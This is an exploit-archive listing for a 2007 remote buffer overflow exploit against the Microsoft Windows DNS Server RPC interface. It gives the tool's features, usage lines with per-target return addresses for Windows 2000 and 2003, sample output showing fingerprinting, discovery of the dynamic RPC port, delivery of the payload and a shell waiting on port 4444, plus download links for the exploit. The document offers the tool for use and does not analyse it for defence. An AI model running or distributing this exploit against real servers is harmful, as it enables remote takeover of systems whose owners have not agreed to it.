MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2

18 Apr 2007, reported by RootType (source: seebug, www.seebug.org)

MS Windows DNS RPC Remote Buffer Overflow Exploit v2, featuring remote port 445, dynamic TCP port targeting, OS fingerprinting and multiple target options for Win2k and Win2k3.

Code

Exploit v2 features:
  - Target remote port 445 (by default, but requires auth)
  - Manual target for dynamic TCP port (without auth)
  - Automatic search for dynamic DNS RPC port
  - Local and remote OS fingerprinting (auto target)
  - Windows 2000 Server and Windows 2003 Server (Spanish) supported by default
  - Fixed bug with Windows 2003 shellcode
  - Universal local exploit for Win2k (automatic search for opcodes)
  - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
  - Added targets for remote Win2k English and Italian (not tested, found with the Metasploit opcode database; please report your own)
  - Microsoft RPC API used ( who cares? :p )


D:\Programación\DNSTEST>dnstest
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

 Usage:   dnstest -h 127.0.0.1 (Universal local exploit)
          dnstest -h host [-t id] [-p port]
 Targets:
      0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
      1 (0x79467ef8) - Win2k  server SP4 Spanish -   (default for win2k )
      2 (0x7c4fedbb) - Win2k  server SP4 English
      3 (0x7963edbb) - Win2k  server SP4 Italian
      4 (0x41414141) - Windows all Denial of Service


D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444


Also available at:

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip
